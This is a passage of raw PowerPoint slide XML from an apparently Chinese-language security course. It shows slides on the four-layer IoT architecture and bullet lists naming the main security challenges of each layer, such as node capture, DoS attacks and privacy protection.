              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="文本框 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9E8C076-5286-4B4B-B76B-0B883DD28E80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10524643" y="3335244"/>
            <a:ext cx="612865" cy="181305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>智能决策</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="文本框 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{678B449D-7FAE-1E4B-8155-00CD34E2CD28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4929808" y="3926255"/>
            <a:ext cx="612865" cy="181305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>网络构建层</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2072" name="Picture 24" descr="无线网络安全测试初探- 安全客，安全资讯平台">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5967F0AA-DD84-2E40-84A7-D5DFBF36844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66880" y="3735442"/>
            <a:ext cx="1144548" cy="697468"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="文本框 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC6A1495-0938-1E41-B4BA-4E75E7AA71A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7586015" y="4432910"/>
            <a:ext cx="612865" cy="181305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>无线网络</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="文本框 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECE0E3A6-E3ED-A74B-885F-BC46771B6CE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8927684" y="4470208"/>
            <a:ext cx="612865" cy="181305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>互联网</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="AutoShape 26" descr="互联网图片素材_免费互联网PNG设计图片大全_图精灵">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C9958D9-F10E-C246-9FD2-7A77CF5DC870}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8092820" y="2644379"/>
            <a:ext cx="183292" cy="1995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76" name="Picture 28" descr="中国互联网企业100强榜单来了:BAT三巨头稳居前三- 商界- 徽商网">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4AC861F-213D-394C-9F0C-024A6B1C7CB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725087" y="3664649"/>
            <a:ext cx="1019729" cy="704517"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="文本框 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{569A296D-4C65-A84C-9296-882D93E50754}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4817623" y="5218184"/>
            <a:ext cx="612865" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>感知识别层</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2078" name="Picture 30" descr="How Field Service Software GPS Tracking Improves Customer Service">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{164FA19C-C53A-864D-A84A-16EA7358D7D9}"/>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696974" y="5067940"/>
            <a:ext cx="1262424" cy="946818"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="文本框 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59082DD2-4A13-0049-B6D3-9F63884BE82F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6028762" y="6055947"/>
            <a:ext cx="612865" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>GPS</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="文本框 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9D432D5-9AAA-434C-8FEF-9D6F0C822A7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7598668" y="6055947"/>
            <a:ext cx="673949" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>传感器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2082" name="Picture 34" descr="Top 10 IoT Sensor Types - List of IoT Sensors and IoT Actuators">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{900776DE-F962-E145-94F4-E62857EF8C9A}"/>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104422" y="5121953"/>
            <a:ext cx="1576049" cy="892805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2084" name="Picture 36" descr="What is RFID?">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9ADC3A9-D44A-D242-9F8A-EE0D5F2A1F19}"/>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875630" y="5071612"/>
            <a:ext cx="1615333" cy="993485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="文本框 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB2F67F0-FFC6-7D45-949A-5452A6B02BD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9387055" y="6051427"/>
            <a:ext cx="673949" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>传感器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2086" name="Picture 38" descr="用手机AR控制智能家居设备_眼爆科技">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A68DAFB8-EAAC-2142-9AEE-C2101D45DD8B}"/>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0596703" y="5141181"/>
            <a:ext cx="1280519" cy="854346"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="文本框 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86E6DF36-5A4A-734D-BCCC-A1CEB42BF0AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11028846" y="6065097"/>
            <a:ext cx="673949" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>智能设备</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="矩形 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEB52951-678D-BF4D-805F-3FD82CDEFAF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="751760" y="2461958"/>
            <a:ext cx="3677631" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>感知识别层：物理世界与信息世界的纽带，获取现实世界的物理数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络构建层：使得感知设备接入互联网中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>管理服务层：将大规模数据存储、处理、分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>综合应用层：服务各种需求的物联网应用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2769558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2.5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 物联网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>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903887" y="1371746"/>
            <a:ext cx="4845747" cy="4616648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>感知识别层面临的主要安全挑战：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>网关节点被攻击者控制，安全性全部丢失。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>普通节点被攻击者控制，如攻击者掌握普通节点密钥。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>普通节点被攻击者补货，但攻击者没有得到普通节点密钥。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>普通节点或者网关节点遭受来自网络的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>接入到物联网的超大量传感器节点的标识识别，认证和控制问题。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>网络构建层面临的主要安全挑战：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>假冒攻击中间人攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>跨异构网络的攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>管理服务层面临的主要安全挑战。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>智能变低能</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>非法认为干预</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>数据破坏遗失</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>综合应用层面临的主要安全挑战。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>隐私信息保护。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>访问权限控制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>攻击监控</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="IoT architecture diagram">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7AEAD5C-EA16-9440-AF1C-D123B2CA54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2367" y="861002"/>
            <a:ext cx="5642062" cy="58604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34706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2.6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>移动应用安全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724790" y="1734623"/>
            <a:ext cx="4845747" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
